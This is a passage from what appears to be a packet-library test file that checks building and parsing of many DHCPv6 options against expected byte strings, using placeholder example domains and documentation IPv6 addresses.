\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' - -= DHCP6OptServerUnicast - Instantiation with specific values (test 2) -raw(DHCP6OptServerUnicast(srvaddr="2001::1", optlen=42)) == b'\x00\x0c\x00* \x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' - -= DHCP6OptServerUnicast - Dissection with default values -a=DHCP6OptServerUnicast(b'\x00\x0c\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') -a.optcode == 12 and a.optlen == 16 and a.srvaddr == "::" - -= DHCP6OptServerUnicast - Dissection with specific values (test 1) -a=DHCP6OptServerUnicast(b'\x00\x0c\x00\x10 \x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') -a.optcode == 12 and a.optlen == 16 and a.srvaddr == "2001::1" - -= DHCP6OptServerUnicast - Dissection with specific values (test 2) -a=DHCP6OptServerUnicast(b'\x00\x0c\x00* \x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') -a.optcode == 12 and a.optlen == 42 and a.srvaddr == "2001::1" - - -############ -############ -+ Test DHCP6 Option - Status Code - -= DHCP6OptStatusCode - Basic Instantiation -raw(DHCP6OptStatusCode()) == b'\x00\r\x00\x02\x00\x00' - -= DHCP6OptStatusCode - Instantiation with specific values -raw(DHCP6OptStatusCode(optlen=42, statuscode=0xff, statusmsg="Hello")) == b'\x00\r\x00*\x00\xffHello' - -= DHCP6OptStatusCode - Automatic Length computation -raw(DHCP6OptStatusCode(statuscode=0xff, statusmsg="Hello")) == b'\x00\r\x00\x07\x00\xffHello' - -# Add tests to verify Unicode behavior - - -############ -############ -+ Test DHCP6 Option - Rapid Commit - -= DHCP6OptRapidCommit - Basic Instantiation -raw(DHCP6OptRapidCommit()) == b'\x00\x0e\x00\x00' - -= DHCP6OptRapidCommit - Basic Dissection -a=DHCP6OptRapidCommit(b'\x00\x0e\x00\x00') -a.optcode == 14 and a.optlen == 0 - - -############ -############ -+ Test DHCP6 Option - User class - -= DHCP6OptUserClass - Basic Instantiation -raw(DHCP6OptUserClass()) == b'\x00\x0f\x00\x00' - -= DHCP6OptUserClass - Basic Dissection -a = DHCP6OptUserClass(b'\x00\x0f\x00\x00') -a.optcode == 15 and a.optlen == 0 and a.userclassdata == [] - -= DHCP6OptUserClass - Instantiation with one user class data rawucture -raw(DHCP6OptUserClass(userclassdata=[USER_CLASS_DATA(data="something")])) == b'\x00\x0f\x00\x0b\x00\tsomething' - -= DHCP6OptUserClass - Dissection with one user class data rawucture -a = DHCP6OptUserClass(b'\x00\x0f\x00\x0b\x00\tsomething') -a.optcode == 15 and a.optlen == 11 and len(a.userclassdata) == 1 and isinstance(a.userclassdata[0], USER_CLASS_DATA) and a.userclassdata[0].len == 9 and a.userclassdata[0].data == b'something' - -= DHCP6OptUserClass - Instantiation with two user class data rawuctures -raw(DHCP6OptUserClass(userclassdata=[USER_CLASS_DATA(data="something"), USER_CLASS_DATA(data="somethingelse")])) == b'\x00\x0f\x00\x1a\x00\tsomething\x00\rsomethingelse' - -= DHCP6OptUserClass - Dissection with two user class data rawuctures -a = DHCP6OptUserClass(b'\x00\x0f\x00\x1a\x00\tsomething\x00\rsomethingelse') -a.optcode == 15 and a.optlen == 26 and len(a.userclassdata) == 2 and isinstance(a.userclassdata[0], USER_CLASS_DATA) and isinstance(a.userclassdata[1], USER_CLASS_DATA) and a.userclassdata[0].len == 9 and a.userclassdata[0].data == b'something' and a.userclassdata[1].len == 13 and a.userclassdata[1].data == b'somethingelse' - - -############ -############ -+ Test DHCP6 Option - Vendor class - -= DHCP6OptVendorClass - Basic Instantiation -raw(DHCP6OptVendorClass()) == b'\x00\x10\x00\x04\x00\x00\x00\x00' - -= DHCP6OptVendorClass - Basic Dissection -a = DHCP6OptVendorClass(b'\x00\x10\x00\x04\x00\x00\x00\x00') -a.optcode == 16 and a.optlen == 4 and a.enterprisenum == 0 and a.vcdata == [] - -= DHCP6OptVendorClass - Instantiation with one vendor class data rawucture -raw(DHCP6OptVendorClass(vcdata=[VENDOR_CLASS_DATA(data="something")])) == b'\x00\x10\x00\x0f\x00\x00\x00\x00\x00\tsomething' - -= DHCP6OptVendorClass - Dissection with one vendor class data rawucture -a = DHCP6OptVendorClass(b'\x00\x10\x00\x0f\x00\x00\x00\x00\x00\tsomething') -a.optcode == 16 and a.optlen == 15 and a.enterprisenum == 0 and len(a.vcdata) == 1 and isinstance(a.vcdata[0], VENDOR_CLASS_DATA) and a.vcdata[0].len == 9 and a.vcdata[0].data == b'something' - -= DHCP6OptVendorClass - Instantiation with two vendor class data rawuctures -raw(DHCP6OptVendorClass(vcdata=[VENDOR_CLASS_DATA(data="something"), VENDOR_CLASS_DATA(data="somethingelse")])) == b'\x00\x10\x00\x1e\x00\x00\x00\x00\x00\tsomething\x00\rsomethingelse' - -= DHCP6OptVendorClass - Dissection with two vendor class data rawuctures -a = DHCP6OptVendorClass(b'\x00\x10\x00\x1e\x00\x00\x00\x00\x00\tsomething\x00\rsomethingelse') -a.optcode == 16 and a.optlen == 30 and a.enterprisenum == 0 and len(a.vcdata) == 2 and isinstance(a.vcdata[0], VENDOR_CLASS_DATA) and isinstance(a.vcdata[1], VENDOR_CLASS_DATA) and a.vcdata[0].len == 9 and a.vcdata[0].data == b'something' and a.vcdata[1].len == 13 and a.vcdata[1].data == b'somethingelse' - - -############ -############ -+ Test DHCP6 Option - Vendor-specific information - -= DHCP6OptVendorSpecificInfo - Basic Instantiation -raw(DHCP6OptVendorSpecificInfo()) == b'\x00\x11\x00\x04\x00\x00\x00\x00' - -= DHCP6OptVendorSpecificInfo - Basic Dissection -a = DHCP6OptVendorSpecificInfo(b'\x00\x11\x00\x04\x00\x00\x00\x00') -a.optcode == 17 and a.optlen == 4 and a.enterprisenum == 0 - -= DHCP6OptVendorSpecificInfo - Instantiation with specific values (one option) -raw(DHCP6OptVendorSpecificInfo(enterprisenum=0xeeeeeeee, vso=[VENDOR_SPECIFIC_OPTION(optcode=43, optdata="something")])) == b'\x00\x11\x00\x11\xee\xee\xee\xee\x00+\x00\tsomething' - -= DHCP6OptVendorSpecificInfo - Dissection with with specific values (one option) -a = DHCP6OptVendorSpecificInfo(b'\x00\x11\x00\x11\xee\xee\xee\xee\x00+\x00\tsomething') -a.optcode == 17 and a.optlen == 17 and a.enterprisenum == 0xeeeeeeee and len(a.vso) == 1 and isinstance(a.vso[0], VENDOR_SPECIFIC_OPTION) and a.vso[0].optlen == 9 and a.vso[0].optdata == b'something' - -= DHCP6OptVendorSpecificInfo - Instantiation with specific values (two options) -raw(DHCP6OptVendorSpecificInfo(enterprisenum=0xeeeeeeee, vso=[VENDOR_SPECIFIC_OPTION(optcode=43, optdata="something"), VENDOR_SPECIFIC_OPTION(optcode=42, optdata="somethingelse")])) == b'\x00\x11\x00"\xee\xee\xee\xee\x00+\x00\tsomething\x00*\x00\rsomethingelse' - -= DHCP6OptVendorSpecificInfo - Dissection with with specific values (two options) -a = DHCP6OptVendorSpecificInfo(b'\x00\x11\x00"\xee\xee\xee\xee\x00+\x00\tsomething\x00*\x00\rsomethingelse') -a.optcode == 17 and a.optlen == 34 and a.enterprisenum == 0xeeeeeeee and len(a.vso) == 2 and isinstance(a.vso[0], VENDOR_SPECIFIC_OPTION) and isinstance(a.vso[1], VENDOR_SPECIFIC_OPTION) and a.vso[0].optlen == 9 and a.vso[0].optdata == b'something' and a.vso[1].optlen == 13 and a.vso[1].optdata == b'somethingelse' - - -############ -############ -+ Test DHCP6 Option - Interface-Id - -= DHCP6OptIfaceId - Basic Instantiation -raw(DHCP6OptIfaceId()) == b'\x00\x12\x00\x00' - -= DHCP6OptIfaceId - Basic Dissection -a = DHCP6OptIfaceId(b'\x00\x12\x00\x00') -a.optcode == 18 and a.optlen == 0 - -= DHCP6OptIfaceId - Instantiation with specific value -raw(DHCP6OptIfaceId(ifaceid="something")) == b'\x00\x12\x00\x09something' - -= DHCP6OptIfaceId - Dissection with specific value -a = DHCP6OptIfaceId(b'\x00\x12\x00\x09something') -a.optcode == 18 and a.optlen == 9 and a.ifaceid == b"something" - - -############ -############ -+ Test DHCP6 Option - Reconfigure Message - -= DHCP6OptReconfMsg - Basic Instantiation -raw(DHCP6OptReconfMsg()) == b'\x00\x13\x00\x01\x0b' - -= DHCP6OptReconfMsg - Basic Dissection -a = DHCP6OptReconfMsg(b'\x00\x13\x00\x01\x0b') -a.optcode == 19 and a.optlen == 1 and a.msgtype == 11 - -= DHCP6OptReconfMsg - Instantiation with specific values -raw(DHCP6OptReconfMsg(optlen=4, msgtype=5)) == b'\x00\x13\x00\x04\x05' - -= DHCP6OptReconfMsg - Dissection with specific values -a = DHCP6OptReconfMsg(b'\x00\x13\x00\x04\x05') -a.optcode == 19 and a.optlen == 4 and a.msgtype == 5 - - -############ -############ -+ Test DHCP6 Option - Reconfigure Accept - -= DHCP6OptReconfAccept - Basic Instantiation -raw(DHCP6OptReconfAccept()) == b'\x00\x14\x00\x00' - -= DHCP6OptReconfAccept - Basic Dissection -a = DHCP6OptReconfAccept(b'\x00\x14\x00\x00') -a.optcode == 20 and a.optlen == 0 - -= DHCP6OptReconfAccept - Instantiation with specific values -raw(DHCP6OptReconfAccept(optlen=23)) == b'\x00\x14\x00\x17' - -= DHCP6OptReconfAccept - Dssection with specific values -a = DHCP6OptReconfAccept(b'\x00\x14\x00\x17') -a.optcode == 20 and a.optlen == 23 - - -############ -############ -+ Test DHCP6 Option - SIP Servers Domain Name List - -= DHCP6OptSIPDomains - Basic Instantiation -raw(DHCP6OptSIPDomains()) == b'\x00\x15\x00\x00' - -= DHCP6OptSIPDomains - Basic Dissection -a = DHCP6OptSIPDomains(b'\x00\x15\x00\x00') -a.optcode == 21 and a.optlen == 0 and a.sipdomains == [] - -= DHCP6OptSIPDomains - Instantiation with one domain -raw(DHCP6OptSIPDomains(sipdomains=["toto.example.org"])) == b'\x00\x15\x00\x12\x04toto\x07example\x03org\x00' - -= DHCP6OptSIPDomains - Dissection with one domain -a = DHCP6OptSIPDomains(b'\x00\x15\x00\x12\x04toto\x07example\x03org\x00') -a.optcode == 21 and a.optlen == 18 and len(a.sipdomains) == 1 and a.sipdomains[0] == "toto.example.org." - -= DHCP6OptSIPDomains - Instantiation with two domains -raw(DHCP6OptSIPDomains(sipdomains=["toto.example.org", "titi.example.org"])) == b'\x00\x15\x00$\x04toto\x07example\x03org\x00\x04titi\x07example\x03org\x00' - -= DHCP6OptSIPDomains - Dissection with two domains -a = DHCP6OptSIPDomains(b'\x00\x15\x00$\x04toto\x07example\x03org\x00\x04TITI\x07example\x03org\x00') -a.optcode == 21 and a.optlen == 36 and len(a.sipdomains) == 2 and a.sipdomains[0] == "toto.example.org." and a.sipdomains[1] == "TITI.example.org." - -= DHCP6OptSIPDomains - Enforcing only one dot at end of domain -raw(DHCP6OptSIPDomains(sipdomains=["toto.example.org."])) == b'\x00\x15\x00\x12\x04toto\x07example\x03org\x00' - - -############ -############ -+ Test DHCP6 Option - SIP Servers IPv6 Address List - -= DHCP6OptSIPServers - Basic Instantiation -raw(DHCP6OptSIPServers()) == b'\x00\x16\x00\x00' - -= DHCP6OptSIPServers - Basic Dissection -a = DHCP6OptSIPServers(b'\x00\x16\x00\x00') -a.optcode == 22 and a. optlen == 0 and a.sipservers == [] - -= DHCP6OptSIPServers - Instantiation with specific values (1 address) -raw(DHCP6OptSIPServers(sipservers = ["2001:db8::1"] )) == b'\x00\x16\x00\x10 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' - -= DHCP6OptSIPServers - Dissection with specific values (1 address) -a = DHCP6OptSIPServers(b'\x00\x16\x00\x10 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') -a.optcode == 22 and a.optlen == 16 and len(a.sipservers) == 1 and a.sipservers[0] == "2001:db8::1" - -= DHCP6OptSIPServers - Instantiation with specific values (2 addresses) -raw(DHCP6OptSIPServers(sipservers = ["2001:db8::1", "2001:db8::2"] )) == b'\x00\x16\x00 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02' - -= DHCP6OptSIPServers - Dissection with specific values (2 addresses) -a = DHCP6OptSIPServers(b'\x00\x16\x00 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02') -a.optcode == 22 and a.optlen == 32 and len(a.sipservers) == 2 and a.sipservers[0] == "2001:db8::1" and a.sipservers[1] == "2001:db8::2" - - -############ -############ -+ Test DHCP6 Option - DNS Recursive Name Server - -= DHCP6OptDNSServers - Basic Instantiation -raw(DHCP6OptDNSServers()) == b'\x00\x17\x00\x00' - -= DHCP6OptDNSServers - Basic Dissection -a = DHCP6OptDNSServers(b'\x00\x17\x00\x00') -a.optcode == 23 and a. optlen == 0 and a.dnsservers == [] - -= DHCP6OptDNSServers - Instantiation with specific values (1 address) -raw(DHCP6OptDNSServers(dnsservers = ["2001:db8::1"] )) == b'\x00\x17\x00\x10 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' - -= DHCP6OptDNSServers - Dissection with specific values (1 address) -a = DHCP6OptDNSServers(b'\x00\x17\x00\x10 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') -a.optcode == 23 and a.optlen == 16 and len(a.dnsservers) == 1 and a.dnsservers[0] == "2001:db8::1" - -= DHCP6OptDNSServers - Instantiation with specific values (2 addresses) -raw(DHCP6OptDNSServers(dnsservers = ["2001:db8::1", "2001:db8::2"] )) == b'\x00\x17\x00 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02' - -= DHCP6OptDNSServers - Dissection with specific values (2 addresses) -a = DHCP6OptDNSServers(b'\x00\x17\x00 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02') -a.optcode == 23 and a.optlen == 32 and len(a.dnsservers) == 2 and a.dnsservers[0] == "2001:db8::1" and a.dnsservers[1] == "2001:db8::2" - - -############ -############ -+ Test DHCP6 Option - DNS Domain Search List Option - -= DHCP6OptDNSDomains - Basic Instantiation -raw(DHCP6OptDNSDomains()) == b'\x00\x18\x00\x00' - -= DHCP6OptDNSDomains - Basic Dissection -a = DHCP6OptDNSDomains(b'\x00\x18\x00\x00') -a.optcode == 24 and a.optlen == 0 and a.dnsdomains == [] - -= DHCP6OptDNSDomains - Instantiation with specific values (1 domain) -raw(DHCP6OptDNSDomains(dnsdomains=["toto.example.com."])) == b'\x00\x18\x00\x12\x04toto\x07example\x03com\x00' - -= DHCP6OptDNSDomains - Dissection with specific values (1 domain) -a = DHCP6OptDNSDomains(b'\x00\x18\x00\x12\x04toto\x07example\x03com\x00') -a.optcode == 24 and a.optlen == 18 and len(a.dnsdomains) == 1 and a.dnsdomains[0] == "toto.example.com." - -= DHCP6OptDNSDomains - Instantiation with specific values (2 domains) -raw(DHCP6OptDNSDomains(dnsdomains=["toto.example.com.", "titi.example.com."])) == b'\x00\x18\x00$\x04toto\x07example\x03com\x00\x04titi\x07example\x03com\x00' - -= DHCP6OptDNSDomains - Dissection with specific values (2 domains) -a = DHCP6OptDNSDomains(b'\x00\x18\x00$\x04toto\x07example\x03com\x00\x04titi\x07example\x03com\x00') -a.optcode == 24 and a.optlen == 36 and len(a.dnsdomains) == 2 and a.dnsdomains[0] == "toto.example.com." and a.dnsdomains[1] == "titi.example.com." - - -############ -############ -+ Test DHCP6 Option - IA_PD Prefix Option - -= DHCP6OptIAPrefix - Basic Instantiation -raw(DHCP6OptIAPrefix()) == b'\x00\x1a\x00\x19\x00\x00\x00\x00\x00\x00\x00\x000 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' - -#TODO : finish me - - -############ -############ -+ Test DHCP6 Option - Identity Association for Prefix Delegation - -= DHCP6OptIA_PD - Basic Instantiation -raw(DHCP6OptIA_PD()) == b'\x00\x19\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' - -= DHCP6OptIA_PD - Instantiation with a list of different opts: IA Address and Status Code (optlen automatic computation) -raw(DHCP6OptIA_PD(iaid=0x22222222, T1=0x33333333, T2=0x44444444, iapdopt=[DHCP6OptIAAddress(), DHCP6OptStatusCode(statuscode=0xff, statusmsg="Hello")])) == b'\x00\x19\x003""""3333DDDD\x00\x05\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r\x00\x07\x00\xffHello' - -#TODO : finish me - - -############ -############ -+ Test DHCP6 Option - NIS Servers - -= DHCP6OptNISServers - Basic Instantiation -raw(DHCP6OptNISServers()) == b'\x00\x1b\x00\x00' - -= DHCP6OptNISServers - Basic Dissection -a = DHCP6OptNISServers(b'\x00\x1b\x00\x00') -a.optcode == 27 and a. optlen == 0 and a.nisservers == [] - -= DHCP6OptNISServers - Instantiation with specific values (1 address) -raw(DHCP6OptNISServers(nisservers = ["2001:db8::1"] )) == b'\x00\x1b\x00\x10 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' - -= DHCP6OptNISServers - Dissection with specific values (1 address) -a = DHCP6OptNISServers(b'\x00\x1b\x00\x10 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') -a.optcode == 27 and a.optlen == 16 and len(a.nisservers) == 1 and a.nisservers[0] == "2001:db8::1" - -= DHCP6OptNISServers - Instantiation with specific values (2 addresses) -raw(DHCP6OptNISServers(nisservers = ["2001:db8::1", "2001:db8::2"] )) == b'\x00\x1b\x00 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02' - -= DHCP6OptNISServers - Dissection with specific values (2 addresses) -a = DHCP6OptNISServers(b'\x00\x1b\x00 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02') -a.optcode == 27 and a.optlen == 32 and len(a.nisservers) == 2 and a.nisservers[0] == "2001:db8::1" and a.nisservers[1] == "2001:db8::2" - - -############ -############ -+ Test DHCP6 Option - NIS+ Servers - -= DHCP6OptNISPServers - Basic Instantiation -raw(DHCP6OptNISPServers()) == b'\x00\x1c\x00\x00' - -= DHCP6OptNISPServers - Basic Dissection -a = DHCP6OptNISPServers(b'\x00\x1c\x00\x00') -a.optcode == 28 and a. optlen == 0 and a.nispservers == [] - -= DHCP6OptNISPServers - Instantiation with specific values (1 address) -raw(DHCP6OptNISPServers(nispservers = ["2001:db8::1"] )) == b'\x00\x1c\x00\x10 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' - -= DHCP6OptNISPServers - Dissection with specific values (1 address) -a = DHCP6OptNISPServers(b'\x00\x1c\x00\x10 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') -a.optcode == 28 and a.optlen == 16 and len(a.nispservers) == 1 and a.nispservers[0] == "2001:db8::1" - -= DHCP6OptNISPServers - Instantiation with specific values (2 addresses) -raw(DHCP6OptNISPServers(nispservers = ["2001:db8::1", "2001:db8::2"] )) == b'\x00\x1c\x00 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02' - -= DHCP6OptNISPServers - Dissection with specific values (2 addresses) -a = DHCP6OptNISPServers(b'\x00\x1c\x00 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02') -a.optcode == 28 and a.optlen == 32 and len(a.nispservers) == 2 and a.nispservers[0] == "2001:db8::1" and a.nispservers[1] == "2001:db8::2" - - -############ -############ -+ Test DHCP6 Option - NIS Domain Name - -= DHCP6OptNISDomain - Basic Instantiation -raw(DHCP6OptNISDomain()) == b'\x00\x1d\x00\x01\x00' - -= DHCP6OptNISDomain - Basic Dissection -a = DHCP6OptNISDomain(b'\x00\x1d\x00\x00') -a.optcode == 29 and a.optlen == 0 and a.nisdomain == b"." - -= DHCP6OptNISDomain - Instantiation with one domain name -raw(DHCP6OptNISDomain(nisdomain="toto.example.org")) == b'\x00\x1d\x00\x12\x04toto\x07example\x03org\x00' - -= DHCP6OptNISDomain - Dissection with one domain name -a = DHCP6OptNISDomain(b'\x00\x1d\x00\x11\x04toto\x07example\x03org\x00') -a.optcode == 29 and a.optlen == 17 and a.nisdomain == b"toto.example.org." - -= DHCP6OptNISDomain - Instantiation with one domain with trailing dot -raw(DHCP6OptNISDomain(nisdomain="toto.example.org.")) == b'\x00\x1d\x00\x12\x04toto\x07example\x03org\x00' - - -############ -############ -+ Test DHCP6 Option - NIS+ Domain Name - -= DHCP6OptNISPDomain - Basic Instantiation -raw(DHCP6OptNISPDomain()) == b'\x00\x1e\x00\x01\x00' - -= DHCP6OptNISPDomain - Basic Dissection -a = DHCP6OptNISPDomain(b'\x00\x1e\x00\x00') -a.optcode == 30 and a.optlen == 0 and a.nispdomain == b"." - -= DHCP6OptNISPDomain - Instantiation with one domain name -raw(DHCP6OptNISPDomain(nispdomain="toto.example.org")) == b'\x00\x1e\x00\x12\x04toto\x07example\x03org\x00' - -= DHCP6OptNISPDomain - Dissection with one domain name -a = DHCP6OptNISPDomain(b'\x00\x1e\x00\x12\x04toto\x07example\x03org\x00') -a.optcode == 30 and a.optlen == 18 and a.nispdomain == b"toto.example.org." - -= DHCP6OptNISPDomain - Instantiation with one domain with trailing dot -raw(DHCP6OptNISPDomain(nispdomain="toto.example.org.")) == b'\x00\x1e\x00\x12\x04toto\x07example\x03org\x00' - - -############ -############ -+ Test DHCP6 Option - SNTP Servers - -= DHCP6OptSNTPServers - Basic Instantiation -raw(DHCP6OptSNTPServers()) == b'\x00\x1f\x00\x00' - -= DHCP6OptSNTPServers - Basic Dissection -a = DHCP6OptSNTPServers(b'\x00\x1f\x00\x00') -a.optcode == 31 and a. optlen == 0 and a.sntpservers == [] - -= DHCP6OptSNTPServers - Instantiation with specific values (1 address) -raw(DHCP6OptSNTPServers(sntpservers = ["2001:db8::1"] )) == b'\x00\x1f\x00\x10 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' - -= DHCP6OptSNTPServers - Dissection with specific values (1 address) -a = DHCP6OptSNTPServers(b'\x00\x1f\x00\x10 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') -a.optcode == 31 and a.optlen == 16 and len(a.sntpservers) == 1 and a.sntpservers[0] == "2001:db8::1" - -= DHCP6OptSNTPServers - Instantiation with specific values (2 addresses) -raw(DHCP6OptSNTPServers(sntpservers = ["2001:db8::1", "2001:db8::2"] )) == b'\x00\x1f\x00 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02' - -= DHCP6OptSNTPServers - Dissection with specific values (2 addresses) -a = DHCP6OptSNTPServers(b'\x00\x1f\x00 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02') -a.optcode == 31 and a.optlen == 32 and len(a.sntpservers) == 2 and a.sntpservers[0] == "2001:db8::1" and a.sntpservers[1] == "2001:db8::2" - -############ -############ -+ Test DHCP6 Option - Information Refresh Time - -= DHCP6OptInfoRefreshTime - Basic Instantiation -raw(DHCP6OptInfoRefreshTime()) == b'\x00 \x00\x04\x00\x01Q\x80' - -= DHCP6OptInfoRefreshTime - Basic Dissction -a = DHCP6OptInfoRefreshTime(b'\x00 \x00\x04\x00\x01Q\x80') -a.optcode == 32 and a.optlen == 4 and a.reftime == 86400 - -= DHCP6OptInfoRefreshTime - Instantiation with specific values -raw(DHCP6OptInfoRefreshTime(optlen=7, reftime=42)) == b'\x00 \x00\x07\x00\x00\x00*' - -############ -############ -+ Test DHCP6 Option - BCMCS Servers - -= DHCP6OptBCMCSServers - Basic Instantiation -raw(DHCP6OptBCMCSServers()) == b'\x00"\x00\x00' - -= DHCP6OptBCMCSServers - Basic Dissection -a = DHCP6OptBCMCSServers(b'\x00"\x00\x00') -a.optcode == 34 and a. optlen == 0 and a.bcmcsservers == [] - -= DHCP6OptBCMCSServers - Instantiation with specific values (1 address) -raw(DHCP6OptBCMCSServers(bcmcsservers = ["2001:db8::1"] )) == b'\x00"\x00\x10 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' - -= DHCP6OptBCMCSServers - Dissection with specific values (1 address) -a = DHCP6OptBCMCSServers(b'\x00"\x00\x10 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') -a.optcode == 34 and a.optlen == 16 and len(a.bcmcsservers) == 1 and a.bcmcsservers[0] == "2001:db8::1" - -= DHCP6OptBCMCSServers - Instantiation with specific values (2 addresses) -raw(DHCP6OptBCMCSServers(bcmcsservers = ["2001:db8::1", "2001:db8::2"] )) == b'\x00"\x00 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02' - -= DHCP6OptBCMCSServers - Dissection with specific values (2 addresses) -a = DHCP6OptBCMCSServers(b'\x00"\x00 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02') -a.optcode == 34 and a.optlen == 32 and len(a.bcmcsservers) == 2 and a.bcmcsservers[0] == "2001:db8::1" and a.bcmcsservers[1] == "2001:db8::2" - - -############ -############ -+ Test DHCP6 Option - BCMCS Domains - -= DHCP6OptBCMCSDomains - Basic Instantiation -raw(DHCP6OptBCMCSDomains()) == b'\x00!\x00\x00' - -= DHCP6OptBCMCSDomains - Basic Dissection -a = DHCP6OptBCMCSDomains(b'\x00!\x00\x00') -a.optcode == 33 and a.optlen == 0 and a.bcmcsdomains == [] - -= DHCP6OptBCMCSDomains - Instantiation with specific values (1 domain) -raw(DHCP6OptBCMCSDomains(bcmcsdomains=["toto.example.com."])) == b'\x00!\x00\x12\x04toto\x07example\x03com\x00' - -= DHCP6OptBCMCSDomains - Dissection with specific values (1 domain) -a = DHCP6OptBCMCSDomains(b'\x00!\x00\x12\x04toto\x07example\x03com\x00') -a.optcode == 33 and a.optlen == 18 and len(a.bcmcsdomains) == 1 and a.bcmcsdomains[0] == "toto.example.com." - -= DHCP6OptBCMCSDomains - Instantiation with specific values (2 domains) -raw(DHCP6OptBCMCSDomains(bcmcsdomains=["toto.example.com.", "titi.example.com."])) == b'\x00!\x00$\x04toto\x07example\x03com\x00\x04titi\x07example\x03com\x00' - -= DHCP6OptBCMCSDomains - Dissection with specific values (2 domains) -a = DHCP6OptBCMCSDomains(b'\x00!\x00$\x04toto\x07example\x03com\x00\x04titi\x07example\x03com\x00') -a.optcode == 33 and a.optlen == 36 and len(a.bcmcsdomains) == 2 and a.bcmcsdomains[0] == "toto.example.com." and a.bcmcsdomains[1] == "titi.example.com." - - -############ -############ -+ Test DHCP6 Option - Relay Agent Remote-ID - -= DHCP6OptRemoteID - Basic Instantiation -raw(DHCP6OptRemoteID()) == b'\x00%\x00\x04\x00\x00\x00\x00' - -= DHCP6OptRemoteID - Basic Dissection -a = DHCP6OptRemoteID(b'\x00%\x00\x04\x00\x00\x00\x00') -a.optcode == 37 and a.optlen == 4 and a.enterprisenum == 0 and a.remoteid == b"" - -= DHCP6OptRemoteID - Instantiation with specific values -raw(DHCP6OptRemoteID(enterprisenum=0xeeeeeeee, remoteid="someid")) == b'\x00%\x00\n\xee\xee\xee\xeesomeid' - -= DHCP6OptRemoteID - Dissection with specific values -a = DHCP6OptRemoteID(b'\x00%\x00\n\xee\xee\xee\xeesomeid') -a.optcode == 37 and a.optlen == 10 and a.enterprisenum == 0xeeeeeeee and a.remoteid == b"someid" - - -############ -############ -+ Test DHCP6 Option - Subscriber ID - -= DHCP6OptSubscriberID - Basic Instantiation -raw(DHCP6OptSubscriberID()) == b'\x00&\x00\x00' - -= DHCP6OptSubscriberID - Basic Dissection -a = DHCP6OptSubscriberID(b'\x00&\x00\x00') -a.optcode == 38 and a.optlen == 0 and a.subscriberid == b"" - -= DHCP6OptSubscriberID - Instantiation with specific values -raw(DHCP6OptSubscriberID(subscriberid="someid")) == b'\x00&\x00\x06someid' - -= DHCP6OptSubscriberID - Dissection with specific values -a = DHCP6OptSubscriberID(b'\x00&\x00\x06someid') -a.optcode == 38 and a.optlen == 6 and a.subscriberid == b"someid" - - -############ -############ -+ Test DHCP6 Option - Client FQDN - -= DHCP6OptClientFQDN - Basic Instantiation -raw(DHCP6OptClientFQDN()) == b"\x00'\x00\x02\x00\x00" - -= 